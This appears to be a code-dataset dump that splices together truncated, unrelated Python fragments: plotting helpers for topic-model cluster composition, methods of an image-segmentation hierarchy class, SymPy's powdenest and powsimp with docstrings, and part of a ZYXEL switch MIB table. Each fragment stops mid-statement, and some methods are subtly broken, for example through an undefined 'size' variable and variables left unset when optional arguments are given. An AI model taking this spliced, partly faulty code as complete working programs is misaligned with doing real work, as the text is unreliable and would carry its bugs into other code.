input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
import os
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
import sys
import seaborn as sns
sns.set()
sns.set_context("paper")
from sklearn import metrics
# get colors from https://medialab.github.io/iwanthue/ or artenatevly from http://phrogz.net/css/distinct-colors.html
colors_cycle = ["#a257d4",
"#e090bf",
"#64c9a3",
"#4b68ae",
"#dc8c2f",
"#cd41a7",
"#d9344f",
"#bc599a",
"#afa1e8",
"#48c1d8",
"#b54545",
"#919233",
"#9a78be",
"#59602a",
"#4e8e2c",
"#9db935",
"#9b563c",
"#e482df",
"#5995d3",
"#6a5198",
"#b05f84",
"#b563c3",
"#5f6b18",
"#a55c21",
"#5754c2",
"#277257",
"#4f9b5e",
"#8b6b29",
"#b8381c",
"#ad2f62",
"#97ba6d",
"#45c37c",
"#5fc250",
"#8c4c7b",
"#e06e87",
"#e2672a",
"#db7756",
"#974858",
"#35743b",
"#bbaf6c",
"#8c4099",
"#e44586",
"#ed5c4c",
"#389c84",
"#cfae3d",
"#eda377",
"#778749",
"#c5935a",
"#de8784",
"#757eec"]
def plot_cluster_composition(fraction_sites, directory, level, normalise=False, label='primary_site', shuffled=False,
algorithm='topsbm'):
sns.set(font_scale=0.8)
df_clusters = pd.read_csv("%s/%s/%s_level_%d_clusters.csv" % (directory, algorithm, algorithm, level), header=[0])
x = np.arange(1, 1 + len(df_clusters.columns))
fig = plt.figure(figsize=(15, 8))
ax = fig.subplots()
fraction_bar_plot(x, fraction_sites, ax)
ax.set_xlabel("cluster", fontsize=20)
if normalise:
ax.set_ylabel("fraction of nodes", fontsize=22)
else:
ax.set_ylabel("number of nodes", fontsize=20)
ax.set_title("%s%s distribution across clusters" % ("Shuffled " if shuffled else '', label), fontsize=20)
ax.legend(ncol=3, loc='upper right')
ax.tick_params(axis='both', labelsize=20)
plt.show()
fig.savefig("%s/%s/%s%sclustercomposition_l%d_%s.pdf" % (
directory, algorithm, "shuffled" if shuffled else '', "fraction_" if normalise else '', int(level), label))
def fraction_bar_plot(x, fraction_sites, ax=None):
global current_color
current_color = -1
if ax is None:
fig = plt.figure(figsize=(15, 8))
ax = fig.subplots()
bottom = np.zeros(len(x))
ymax = 0
for site, data in fraction_sites.items():
if np.max(data) == 0:
continue
ax.bar(x, data, label=site, bottom=bottom, color=get_color_cycle())
bottom = bottom + data
def get_Palette(site):
palette_map = dict({'Brain': 'Blues',
'Breast': 'Reds',
'Kidney': 'Greens',
'Lung': 'Oranges',
'Thyroid': 'Greys',
'Uterus': 'Purples',
'Prostate': 'BuGn',
'Ovary': 'BuPu',
'Lymph Nodes': 'OrRd',
'Soft Tissue': 'PuRd',
'Esophagus': 'YlGn',
'Stomach': 'YlRd',
'Bone Marrow': 'PuBuGn',
'Skin': 'YlOrRd',
'Adipose Tissue': 'YlOrBr',
'Blood': 'RdPu',
'Pancreas': 'OrRd',
'Testis': 'GnBu'})
for k in palette_map.keys():
if k in site:
return palette_map[k]
current_color = -1
def get_color_cycle():
global current_color
current_color += 1
if current_color >= len(colors_cycle):
current_color = 0
return colors_cycle[current_color]
def get_cluster_given_l(l, directory, algorithm='topsbm'):
df_clusters = pd.read_csv("%s/%s/%s_level_%d_clusters.csv" % (directory, algorithm, algorithm, l), header=[0],
index_col=None)
cluster = {}
for i, c in enumerate(df_clusters.columns):
cluster[i] = df_clusters[c].dropna().values
return cluster
def get_topic_given_l(l, directory, algorithm='topsbm'):
df_topics = pd.read_csv("%s/%s/%s_level_%d_topics.csv" % (directory, algorithm, algorithm, l), header=[0])
topic = {}
for i, c in enumerate(df_topics.columns):
topic[i] = df_topics[c].dropna().values
return topic
def get_fraction_sites(cluster, df_files, label='primary_site', normalise=False):
fraction_sites = {}
c_fraction_site = {}
for site in df_files[label].dropna().unique():
fraction_sites[site] = []
c_fraction_site[site] = 0
for i, c in enumerate(cluster):
for sample in cluster[i]:
foundsample = get_file(sample, df_files)
if foundsample is not None:
c_fraction_site[foundsample[label]] += 1
else:
if 'unknown' in c_fraction_site.keys():
c_fraction_site['unknown'] +=1
else:
c_fraction_site['unknown'] = 1
fraction_sites['unknown']=[]
for site in fraction_sites:
if normalise:
norm = float(len(cluster[i]))
else:
norm = 1
if norm > 0:
fraction_sites[site].append(c_fraction_site[site] / norm)
else:
fraction_sites[site].append(np.nan)
c_fraction_site[site] = 0
df = pd.DataFrame(data=fraction_sites).dropna(how='all', axis=0)
##put first columns that have high values in average
avgs = df.apply(lambda x: np.average(x.to_numpy()[x.to_numpy().nonzero()[0]]), axis=0)
df = df.transpose()
df.insert(0, 'avg', avgs)
df = df.sort_values(by=['avg'], axis=0, ascending=False).drop('avg', axis=1).transpose()
df = df.sort_values(by=[tissue for tissue in df.columns], axis=0, ascending=False)
return df.to_dict(orient='list')
def get_clustersinfo(cluster, fraction_sites):
clustersinfo = {
"maximum": [],
"homogeneity": [],
"sizes": [],
"nclasses": []
}
for icluster in cluster:
maximum = 0
homo = 0
size = 0
nclass = 0
site_maximum = ''
cumulative = 0
for site, data in fraction_sites.items():
cdata = data[icluster]
cumulative += cdata
if cdata > maximum:
maximum = cdata
site_maximum = site
if cdata > 0:
nclass += 1
# using fraction_items normalised
if cdata <= 1:
homo -= cdata * np.log(cdata)
size += cdata
if cumulative > 0:
clustersinfo['maximum'].append([float(maximum) / cumulative, site_maximum])
else:
clustersinfo['maximum'].append([0, site_maximum])
clustersinfo['sizes'].append(size)
clustersinfo['nclasses'].append(nclass)
clustersinfo['homogeneity'].append(1 - homo)
return clustersinfo
def plot_maximum(clustersinfo, cluster, label, level, directory, clustersinfo_shuffle=None, algorithm='topsbm'):
fig = plt.figure(figsize=(15, 6))
ax = fig.subplots(1, 2)
bins = 10
real = np.array(clustersinfo['maximum'])[:, 0].astype(float)
ax[0].plot(np.sort(real), marker='o', ms=25, ls='')
ax[1].hist(np.sort(real), histtype='step', bins=bins, lw=4, density=True, range=(0.05, 1.05))
shuffled = False
if clustersinfo_shuffle is not None:
shuffled = np.array(clustersinfo_shuffle['maximum'])[:, 0].astype(float)
ax[0].plot(np.sort(shuffled), marker='o', ls='', ms=25)
ax[1].hist(np.sort(shuffled), histtype='step', bins=bins, lw=4, density=True, range=(0.05, 1.05))
shuffled = True
ax[0].plot(np.arange(len(cluster)), [0.8 for i in range(len(cluster))], visible=True, ls='--')
for axi in ax:
axi.tick_params(axis='both', labelsize=20)
ax[0].set_xlabel("cluster", fontsize=20)
ax[0].set_ylabel("maximum fraction\nwith same %s" % label, fontsize=20)
ax[0].set_ylim((0, 1.1))
ax[1].set_xlabel("maximum fraction\nwith same %s" % label, fontsize=20)
ax[1].set_ylabel("pdf", fontsize=20)
plt.rc('xtick', labelsize=18)
plt.rc('ytick', labelsize=18)
plt.show()
fig.savefig(
"%s/%s/%scluster_maximum_l%d_%s.pdf" % (directory, algorithm, "shuffled" if shuffled else '', level, label))
def plot_maximum_size(clustersinfo, label, level, directory, clustersinfo_shuffle=None, algorithm='topsbm'):
fig = plt.figure(figsize=(15, 6))
x = np.array(clustersinfo['sizes']).astype(int)
y = np.array(clustersinfo['maximum'])[:, 0].astype(float)
plt.scatter(x, y, lw=10, label='clusters')
plt.xlim(0, np.max(x) + np.max(x) / 10)
plt.plot(np.linspace(0.5, x.max()), 1. / np.linspace(0.5, x.max()), label='uniform')
shuffled = False
if clustersinfo_shuffle is not None:
shuffled = True
x_shuffle = np.array(clustersinfo_shuffle['sizes']).astype(int)
y_shuffle = np.array(clustersinfo_shuffle['maximum'])[:, 0].astype(float)
plt.scatter(x_shuffle, y_shuffle, lw=10, label='clusters shuffled')
plt.xlim(0, np.max(x_shuffle) + np.max(x_shuffle) / 10)
plt.xlabel("cluster size", fontsize=20)
plt.ylabel("maximum fraction\nwith same %s" % label, fontsize=20)
plt.ylim((0, 1.1))
plt.legend(loc='best', fontsize=20)
plt.rc('xtick', labelsize=18)
plt.rc('ytick', labelsize=18)
plt.show()
fig.savefig(
"%s/%s/%sclusterhomosize_l%d_%s.pdf" % (directory, algorithm, "shuffled" if shuffled else '', level, label))
def plot_maximum_label(clustersinfo, label, level, directory, clustersinfo_shuffle=None, algorithm='topsbm'):
fig = plt.figure(figsize=(10, 6))
x = np.array(clustersinfo['nclasses']).astype(int)
y = np.array(clustersinfo['maximum'])[:, 0].astype(float)
shuffled = False
plt.scatter(x, y, lw=10, alpha=0.9, label='clusters')
plt.plot(np.arange(1, np.max(x) + 2), 1. / np.arange(1, np.max(x) + 2), ls='--', c='cyan', label='uniform')
plt.xlim(0.95, np.max(x) + 0.5)
if clustersinfo_shuffle is not None:
x_shuffle = np.array(clustersinfo_shuffle['nclasses']).astype(int)
y_shuffle = np.array(clustersinfo_shuffle['maximum'])[:, 0].astype(float)
plt.scatter(x_shuffle, y_shuffle, lw=10, alpha=0.9, label='clusters shuffled')
plt.plot(np.arange(1, np.max(x_shuffle) + 2), 1. / np.arange(1, np.max(x_shuffle) + 2), ls='--', c='cyan',
label='')
shuffled = True
plt.xlim(0.95, np.max(x_shuffle) + 0.5)
plt.xlabel("number of labels", fontsize=20)
plt.ylabel("maximum fraction\nwith same %s" % label, fontsize=20)
plt.ylim((0, 1.1))
plt.rc('xtick', labelsize=16)
plt.rc('ytick', labelsize=16)
plt.legend(loc='lower right', fontsize=20)
plt.show()
fig.savefig(
"%s/%s/%scluster_homon_l%d_%s.pdf" % (directory, algorithm, "shuffled" if shuffled else '', level, label))
def plot_labels_size(clustersinfo, label, level, directory, clustersinfo_shuffle=None, algorithm='topsbm'):
fig = plt.figure(figsize=(10, 6))
x = np.array(clustersinfo['sizes']).astype(float)
y = np.array(clustersinfo['nclasses']).astype(int)
plt.xlim(x.min() - 10, x.max() + 5)
plt.ylim(y.min() - 2, y.max() + 5)
shuffled = False
plt.scatter(x, y, lw=10, alpha=0.9, label='clusters')
if clustersinfo_shuffle is not None:
x_shuffle = np.array(clustersinfo_shuffle['sizes']).astype(float)
y_shuffle = np.array(clustersinfo_shuffle['nclasses']).astype(int)
plt.scatter(x_shuffle, y_shuffle, lw=10, alpha=0.9, label='clusters shuffled')
plt.xlim(x.min() - 10, x_shuffle.max() + 5)
plt.ylim(y.min() - 2, y_shuffle.max() + 8)
shuffled = True
plt.xlabel("cluster size", fontsize=20)
plt.ylabel("number of labels", fontsize=20)
plt.legend(loc='upper right', fontsize=20)
plt.rc('xtick', labelsize=16)
plt.rc('ytick', labelsize=16)
plt.show()
fig.savefig(
"%s/%s/%scluster_shuffle_label_size_l%d_%s.pdf" % (
directory, algorithm, "shuffled" if shuffled else '', level, label))
def make_heatmap(fraction_sites, directory, label, level, shuffled=False, normalise=False, algorithm='topsbm'):
sns.set(font_scale=2)
found_classes = []
for site, data in fraction_sites.items():
if np.max(data) == 0:
continue
found_classes.append(site)
for arr in fraction_sites.values():
x = len(arr)
break
x = np.arange(1, 1 + x)
fig = plt.figure(figsize=(30, 10))
fig.subplots(1)
sns.heatmap(pd.DataFrame(data=fraction_sites).loc[:, found_classes].transpose(), vmin=0, cmap="RdYlBu_r",
xticklabels=x)
fig.savefig("%s/%s/%sheatmap_cluster%s_l%d_%s.pdf" % (
directory, algorithm, "shuffled" if shuffled else '', "fraction_" if normalise else '', int(level), label))
def get_file(sample, df_file):
for fullsample in df_file.index.values:
if sample in fullsample:
return df_file.loc[fullsample, :]
return None
def define_labels(cluster, df_files, label='primary_site', verbose=False):
true_labels = []
predicted_labels = []
for c in cluster:
if verbose:
print(c)
for sample in cluster[c]:
try:
true_labels.append(get_file(sample, df_files)[label])
predicted_labels.append(c)
except:
true_labels.append('')
predicted_labels.append('')
print(*sys.exc_info())
print("error searching %s in %s" % (label, sample))
_, true_labels = np.unique(true_labels, return_inverse=True)
return true_labels, predicted_labels
def add_score_lines(ax, scores, labels=None, h=False, c=False, alpha=0.8, **kwargs):
'''
add to ax lines in scores
add homogeneity and completness if required by h and c
'''
colors = {
'primary_site': 'blue',
'hsbm': 'blue',
'secondary_site': 'red',
'status': 'red',
'hSBM': 'blue',
'mixed': 'green',
'hierhsbm': 'purple',
'hsbm->hierachical': 'purple',
'disease_type': 'red',
'shuffle': 'orange',
'tm': 'darkcyan',
'cc': 'darkred',
'disease_tissue': 'purple',
'hierarchical': 'darkgreen',
'lda': 'violet',
'RPPA Clusters': 'red',
'wgcna': 'purple'
}
for label in labels:
if label not in scores.keys():
print("No score for %s"%label)
continue
if label not in colors.keys():
colors[label]='darkblue'
xl = scores[label]['xl']
if h:
ax.plot(xl, scores[label]['h'], ls='-.', c=colors[label], marker='x', lw=0.5, ms=25, alpha=alpha,
label='homogeneity - %s' % label)
if c:
ax.plot(xl, scores[label]['c'], ls=':', c=colors[label], marker='<', lw=0.5, ms=25, alpha=alpha,
label='completness - %s' % label)
if len(scores[label]['V']) == len(xl):
ax.plot(xl, scores[label]['V'], label='%s' % label, ls='-', c=colors[label], marker='o', lw=0.5, ms=25,
**kwargs)
else:
raise(ValueError("xl has got wrong lenght"))
customize_metric_plot(ax, xl)
def customize_metric_plot(ax, xl):
ax.set_xlabel("Number of clusters", fontsize=22)
ax.set_ylabel("NMI score", fontsize=22)
ax.set_ylim((0, 1.1))
ax.set_xlim(1, np.max(xl)*1.1)
ax.set_xscale('log')
ax.legend(loc='best', fontsize=24)
def plot_topic_size(directory, l, algorithm='topsbm'):
df_topics = pd.read_csv("%s/%s/%s_level_%d_topics.csv" % (directory, algorithm, algorithm, l))
sizes = []
for t in df_topics.columns:
sizes.append(len(df_topics.loc[:, t].dropna()))
bins = np.linspace(0.5, np.max(sizes) + 0.5, int((np.max(sizes) + 1) / (np.max(sizes) / 5)))
bin_counts, bin_edges, _ = plt.hist(sizes, histtype='step', lw=2, bins=bins)
fig = | |
if level is None:
# all levels
result = [self.getNNew(level=t_level) for t_level
in range(self.topLevel+1)]
return result
else:
# level specified
return len(self.findNewIds(level=level))
def findIds(self, func, kargs):
"""
Returns ids for which function func applied on arguments arg retruns
True.
Arguments:
- func:
- args: dictionary containing func arguments
Returns: list of ids
"""
# in progress
return [id_ for id_ in self.ids if func(**kargs)]
def findIdsByVolume(self, min=None, max=None, volume=None):
"""
Retturns ids of segments that have volume between min (inclusive) and
max (exclusive).
If min (max) argument is not specified min (max) limit is not imposed.
If (arg) volume is given segment volums are not calculated.
Arguments:
- min: minimum volume (inclusive)
- max: maximum volume (exclusive)
- volume: array of volumes indexed by ids
"""
# get volume of all segments
if volume is None:
vol = self.getVolume()
# impose limits
ids = self.ids
if min is not None:
ids = [id_ for id_ in ids if vol[id_] >= min]
if max is not None:
ids = [id_ for id_ in ids if vol[id_] < max]
return ids
def findIdsBySVRatio(self, min=None, max=None, volume=None,
surface=None, thick=1):
"""
Retturns ids of segments that have volube between min and max
(inclusive).
Arguments:
- min: minimum surface to volume ratio (inclusive)
- max: maximum surface to volume ratio (exclusive)
- volume: array of volumes indexed by ids
- surface: array of surfaces indexed by ids
- thick: thickness of surfaces
"""
# get volume of all segments
if volume is None:
vol = self.getVolume()
if surface is None:
sur = self.getSurface(size=size)
sv_ratio = sur / vol
# impose limits
ids = self.ids
if min is not None:
ids = [id_ for id_ in ids if sv_ratio[id_] >= min]
if max is not None:
ids = [id_ for id_ in ids if sv_ratio[id_] < max]
return ids
def getVolume(self, ids=None):
"""
Finds volume of segments whose ids are specified, or of all segments
id ids is None.
Arguments:
- ids: list of ids
Returns:
- if ids is None: ndarray of volumes indexed by ids (0-th element is 0)
- if ids are given: list of volumes corresponding to ids
"""
# get volumes of segment extensions over lower levels
from .morphology import Morphology
mor = Morphology(segments=self.data, ids=self.ids)
vol = mor.getVolume()
# for each segment add voulmes of all segments directly below the segment
for level in range(1, self.topLevel+1):
for id_ in self.getIds(level):
for l_id in self.getLowerIds(id_):
vol[id_] += vol[l_id]
# return
if ids is None:
vol[0] = 0
return vol
else:
return vol[ids]
def getSurface(self, ids=None, thick=1):
"""
Finds surface of segments whose ids are specified, or of all segments
id ids is None.
Uses Segment.getSurface to obtain and calculate surfaces.
Arguments:
- ids: list of ids
- thick: thickness of surface
Returns:
- if ids is None: ndarray of surfaces indexed by ids (0-th element is 0)
- if ids a re given: list of surfaces corresponding to ids
"""
# find levels to which ids belong
if ids is None:
levels = list(range(self.topLevel+1))
else:
levels = set(self.getIdLevels(ids))
# get surfaces
from .morphology import Morphology
mor = Morphology()
for level in levels:
level_seg = self.extractLevel(level=level, new=True)
curr_mor = Morphology(level_seg)
curr_mor.getSurface(size=thick, copy=False)
mor.merge(curr_mor)
sur = mor.surface
sur[0] = 0
if ids is None:
return sur
else:
return sur[ids]
def findIdsByNBound(self, min=None, max=None, contacts=None):
"""
Returns ids of segments that contact at least min and at most max
boundaries.
Arguments:
- min/max: min/max number of contacted boundaries
- contacts: (Contacts) contacts between segments and boundaries, if
None self.contacts is used
Returns: (list) segment ids
"""
# count number of contacted boundaries for all segments
n_bound = self.getNBound(contacts=contacts)
# impose limits
ids = self.ids
if min is not None:
ids = [id_ for id_ in ids if n_bound[id_] >= min]
if max is not None:
ids = [id_ for id_ in ids if n_bound[id_] <= max]
return ids
def getNBound(self, ids=None, contacts=None):
"""
Finds number of contacted boundaries.
Argument:
- ids: (list, ndarray, or single int) segment id(s)
- contacts: (Contacts) contacts between segments and boundaries, if
None self.contacts is used
Returns (int) number of boundary ids if arg ids is a sigle int, or a
list if it is a list (or ndarray)
"""
# set contacts
if contacts is None:
contacts = self.contacts
# get n bound
if ids is None:
n_bound = numpy.zeros(shape=self.maxId+1, dtype='int')
for id_ in self.ids:
n_bound[id_] = self.getBoundIds(id_, contacts=contacts).size
return n_bound
elif isinstance(ids, list) or isinstance(ids, numpy.ndarray):
return [self.getNBound(id_, contacts=contacts) for id_ in ids]
else:
return self.getBoundIds(ids, contacts=contacts).size
def getBoundIds(self, ids, contacts=None):
"""
Return boundary ids that contact each of the specified segment ids.
Argument:
- ids: (list, ndarray, or single int) segment id(s)
- contacts: (Contacts) contacts between segments and boundaries, if
None self.contacts is used
Returns ndarray of boundary ids if ids is a sigle int, or a list of
ndarrays if it is a list (or ndarray)
"""
if isinstance(ids, list) or isinstance(ids, numpy.ndarray):
return [self.getBoundIds(id_, contacts=contacts) for id_ in ids]
else:
id_ = ids
if contacts is None:
contacts = self.contacts
b_ids = contacts.findBoundaries(segmentIds=id_, nSegment=1,
mode='at_least', update=False)
return b_ids
def getDensity(self, image, ids=None):
"""
Calculates density-related statistics (mean, std, min, max).
Only the values for segments whose ids are specified are calculated,
but the returned object still have (wrong) values for other ids. If
ids is None density for all ids is calculated.
Arguments:
- image: ndarray of Image object containing a (grayscale) image
- ids
Returns Statistics objects with following attributes:
- mean
- std
- min
- max
Each of these is an array indexed by ids (e.g. mean[3] is the mean value
of segment 3). Elements at position 0 are set to 0. If ther is no ids,
all above attributes are None.
"""
# figure out image
if isinstance(image, Grey):
image = image.data
# find levels to which ids belong
if ids is None:
levels = list(range(self.topLevel+1))
else:
levels = set(self.getIdLevels(ids))
# get density stats of segment extensions over all levels
dens = Statistics()
for level in levels:
level_seg = self.extractLevel(level=level, new=True)
dens.calculate(data=image, labels=level_seg.data, ids=level_seg.ids)
# set elements at position 0 to 0
try:
dens.mean[0] = 0
dens.std[0] = 0
dens.min[0] = 0
dens.max[0] = 0
except TypeError:
pass
return dens
##################################################################
#
# Conversion
#
#################################################################
def toSegment(self, copy=False):
"""
Makes Segment object from this instance. Makes sense only of this
instance is flat (no segment is above or below any other segment).
Sets data, ids, threshold structEl and positional attributes. Data is
copied if argument copy is True. All other attributes are always copied.
Also extracts values of all (level defined) properties corresponding
to of this instance and saves them as attributes of the newly created
Segment. These attributes are ndarrays indexed by ids (of the Segment
object).
Argument:
- copy: if True a copy of self.data is made
Returns Segment object.
"""
# set data and ids
from .segment import Segment
seg = Segment(data=self.data, ids=self.ids, copy=copy)
# set positionong
seg.copyPositioning(self)
# set thresholds
#seg.thresh = self.thresh
# set properties (indexed by ids)
props = self.extractProperties(ids=seg.ids)
seg.setProperties(props)
# set structEl
if self.structEl is not None:
seg.structEl = deepcopy(self.structEl)
# set contact and count se connectivities
self.contactStructElConn = seg.contactStructElConn
self.countStructElConn = seg.countStructElConn
return seg
##################################################################
#
# Dendogram related
#
#################################################################
def dendogram(
self, mode='center', nodes=None, nodesize=2, ids=False,
line_color='black', line_width=1.0, new_plot=True):
"""
Plots dendogram of this hierarchy.
Note: works only if package matplotlib.pyplot can be imported.
ToDo:
- show/label only new nodes
- perhaps put the threshold part in ThreshConn
- put constants to arguments
- optimize v_lines
Arguments:
- mode: determines how an id (node) is positioned in respect | |
>>> i, j = symbols('i,j', integer=True)
>>> powdenest((x**x)**(i + j)) # -X-> (x**x)**i*(x**x)**j
x**(x*(i + j))
But exp() will be denested by moving all non-log terms outside of
the function; this may result in the collapsing of the exp to a power
with a different base:
>>> powdenest(exp(3*y*log(x)))
x**(3*y)
>>> powdenest(exp(y*(log(a) + log(b))))
(a*b)**y
>>> powdenest(exp(3*(log(a) + log(b))))
a**3*b**3
If assumptions allow, symbols can also be moved to the outermost exponent:
>>> i = Symbol('i', integer=True)
>>> p = Symbol('p', positive=True)
>>> powdenest(((x**(2*i))**(3*y))**x)
((x**(2*i))**(3*y))**x
>>> powdenest(((x**(2*i))**(3*y))**x, force=True)
x**(6*i*x*y)
>>> powdenest(((p**(2*a))**(3*y))**x)
p**(6*a*x*y)
>>> powdenest(((x**(2*a/3))**(3*y/i))**x)
((x**(2*a/3))**(3*y/i))**x
>>> powdenest((x**(2*i)*y**(4*i))**z, force=True)
(x*y**2)**(2*i*z)
>>> n = Symbol('n', negative=True)
>>> powdenest((x**i)**y, force=True)
x**(i*y)
>>> powdenest((n**i)**x, force=True)
(n**i)**x
"""
if force:
eq, rep = posify(eq)
return powdenest(eq, force=False).xreplace(rep)
if polar:
eq, rep = polarify(eq)
return unpolarify(powdenest(unpolarify(eq, exponents_only=True)), rep)
new = powsimp(sympify(eq))
return new.xreplace(Transform(
_denest_pow, filter=lambda m: m.is_Pow or m.func is exp))
_y = Dummy('y')
def powsimp(expr, deep=False, combine='all', force=False, measure=count_ops):
"""
reduces expression by combining powers with similar bases and exponents.
Notes
=====
If deep is True then powsimp() will also simplify arguments of
functions. By default deep is set to False.
If force is True then bases will be combined without checking for
assumptions, e.g. sqrt(x)*sqrt(y) -> sqrt(x*y) which is not true
if x and y are both negative.
You can make powsimp() only combine bases or only combine exponents by
changing combine='base' or combine='exp'. By default, combine='all',
which does both. combine='base' will only combine::
a a a 2x x
x * y => (x*y) as well as things like 2 => 4
and combine='exp' will only combine
::
a b (a + b)
x * x => x
combine='exp' will strictly only combine exponents in the way that used
to be automatic. Also use deep=True if you need the old behavior.
When combine='all', 'exp' is evaluated first. Consider the first
example below for when there could be an ambiguity relating to this.
This is done so things like the second example can be completely
combined. If you want 'base' combined first, do something like
powsimp(powsimp(expr, combine='base'), combine='exp').
Examples
========
>>> from sympy import powsimp, exp, log, symbols
>>> from sympy.abc import x, y, z, n
>>> powsimp(x**y*x**z*y**z, combine='all')
x**(y + z)*y**z
>>> powsimp(x**y*x**z*y**z, combine='exp')
x**(y + z)*y**z
>>> powsimp(x**y*x**z*y**z, combine='base', force=True)
x**y*(x*y)**z
>>> powsimp(x**z*x**y*n**z*n**y, combine='all', force=True)
(n*x)**(y + z)
>>> powsimp(x**z*x**y*n**z*n**y, combine='exp')
n**(y + z)*x**(y + z)
>>> powsimp(x**z*x**y*n**z*n**y, combine='base', force=True)
(n*x)**y*(n*x)**z
>>> x, y = symbols('x y', positive=True)
>>> powsimp(log(exp(x)*exp(y)))
log(exp(x)*exp(y))
>>> powsimp(log(exp(x)*exp(y)), deep=True)
x + y
Radicals with Mul bases will be combined if combine='exp'
>>> from sympy import sqrt, Mul
>>> x, y = symbols('x y')
Two radicals are automatically joined through Mul:
>>> a=sqrt(x*sqrt(y))
>>> a*a**3 == a**4
True
But if an integer power of that radical has been
autoexpanded then Mul does not join the resulting factors:
>>> a**4 # auto expands to a Mul, no longer a Pow
x**2*y
>>> _*a # so Mul doesn't combine them
x**2*y*sqrt(x*sqrt(y))
>>> powsimp(_) # but powsimp will
(x*sqrt(y))**(5/2)
>>> powsimp(x*y*a) # but won't when doing so would violate assumptions
x*y*sqrt(x*sqrt(y))
"""
def recurse(arg, **kwargs):
_deep = kwargs.get('deep', deep)
_combine = kwargs.get('combine', combine)
_force = kwargs.get('force', force)
_measure = kwargs.get('measure', measure)
return powsimp(arg, _deep, _combine, _force, _measure)
expr = sympify(expr)
if not isinstance(expr, Basic) or expr.is_Atom or expr in (
exp_polar(0), exp_polar(1)):
return expr
if deep or expr.is_Add or expr.is_Mul and _y not in expr.args:
expr = expr.func(*[recurse(w) for w in expr.args])
if expr.is_Pow:
return recurse(expr*_y, deep=False)/_y
if not expr.is_Mul:
return expr
# handle the Mul
if combine in ('exp', 'all'):
# Collect base/exp data, while maintaining order in the
# non-commutative parts of the product
c_powers = defaultdict(list)
nc_part = []
newexpr = []
coeff = S.One
for term in expr.args:
if term.is_Rational:
coeff *= term
continue
if term.is_Pow:
term = _denest_pow(term)
if term.is_commutative:
b, e = term.as_base_exp()
if deep:
b, e = [recurse(i) for i in [b, e]]
c_powers[b].append(e)
else:
# This is the logic that combines exponents for equal,
# but non-commutative bases: A**x*A**y == A**(x+y).
if nc_part:
b1, e1 = nc_part[-1].as_base_exp()
b2, e2 = term.as_base_exp()
if (b1 == b2 and
e1.is_commutative and e2.is_commutative):
nc_part[-1] = Pow(b1, Add(e1, e2))
continue
nc_part.append(term)
# add up exponents of common bases
for b, e in ordered(iter(c_powers.items())):
# allow 2**x/4 -> 2**(x - 2); don't do this when b and e are
# Numbers since autoevaluation will undo it, e.g.
# 2**(1/3)/4 -> 2**(1/3 - 2) -> 2**(1/3)/4
if (b and b.is_Number and not all(ei.is_Number for ei in e) and \
coeff is not S.One and
b not in (S.One, S.NegativeOne)):
m = multiplicity(abs(b), abs(coeff))
if m:
e.append(m)
coeff /= b**m
c_powers[b] = Add(*e)
if coeff is not S.One:
if coeff in c_powers:
c_powers[coeff] += S.One
else:
c_powers[coeff] = S.One
# convert to plain dictionary
c_powers = dict(c_powers)
# check for base and inverted base pairs
be = list(c_powers.items())
skip = set() # skip if we already saw them
for b, e in be:
if b in skip:
continue
bpos = b.is_positive or b.is_polar
if bpos:
binv = 1/b
if b != binv and binv in c_powers:
if b.as_numer_denom()[0] is S.One:
c_powers.pop(b)
c_powers[binv] -= e
else:
skip.add(binv)
e = c_powers.pop(binv)
c_powers[b] -= e
# check for base and negated base pairs
be = list(c_powers.items())
_n = S.NegativeOne
for i, (b, e) in enumerate(be):
if ((-b).is_Symbol or b.is_Add) and -b in c_powers:
if (b.is_positive in (0, 1) or e.is_integer):
c_powers[-b] += c_powers.pop(b)
if _n in c_powers:
c_powers[_n] += e
else:
c_powers[_n] = e
# filter c_powers and convert to a list
c_powers = [(b, e) for b, e in c_powers.items() if e]
# ==============================================================
# check for Mul bases of Rational powers that can be combined with
# separated bases, e.g. x*sqrt(x*y)*sqrt(x*sqrt(x*y)) ->
# (x*sqrt(x*y))**(3/2)
# ---------------- helper functions
def ratq(x):
'''Return Rational part of x's exponent as it appears in the bkey.
'''
return bkey(x)[0][1]
def bkey(b, e=None):
'''Return (b**s, c.q), c.p where e -> c*s. If e is not given then
it will be taken by using as_base_exp() on the input b.
e.g.
x**3/2 -> (x, 2), 3
x**y -> (x**y, 1), 1
x**(2*y/3) -> (x**y, 3), 2
exp(x/2) -> (exp(a), 2), 1
'''
if e is not None: # coming from c_powers or from below
if e.is_Integer:
return (b, S.One), e
elif e.is_Rational:
return (b, Integer(e.q)), Integer(e.p)
else:
c, m = e.as_coeff_Mul(rational=True)
if c is not S.One:
return (b**m, Integer(c.q)), Integer(c.p)
else:
return (b**e, S.One), S.One
else:
return bkey(*b.as_base_exp())
def update(b):
'''Decide what to do with base, b. If its exponent is now an
integer multiple of the Rational denominator, then remove it
and put the factors of its base in the common_b dictionary or
update the existing bases if necessary. If it has been zeroed
out, simply remove the base.
'''
newe, r = divmod(common_b[b], b[1])
if not r:
common_b.pop(b)
if newe:
for m in Mul.make_args(b[0]**newe):
b, e = bkey(m)
if b not in common_b:
common_b[b] = 0
common_b[b] += e
if b[1] != 1:
bases.append(b)
# ---------------- end of helper functions
# assemble a dictionary of the factors having a Rational power
common_b = {}
done = []
bases = []
for b, e in c_powers:
b, e = bkey(b, e)
common_b[b] = e
if b[1] != 1 and b[0].is_Mul:
bases.append(b)
bases.sort(key=default_sort_key) # this makes tie-breaking canonical
bases.sort(key=measure, reverse=True) # handle longest first
for base in bases:
if base not in common_b: # it may have been removed already
continue
b, exponent = base
last = False # True when no factor of base is a radical
qlcm = 1 # the lcm of the radical denominators
while True:
bstart = b
qstart = qlcm
bb = [] # list of factors
ee = [] # (factor's expo. and it's current value | |
},
],
"range" : {
"min" : "0",
"max" : "1024"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectLogInterval" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.3.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "2147483647"
},
],
"range" : {
"min" : "0",
"max" : "2147483647"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectVlanTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.4",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectVlanEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
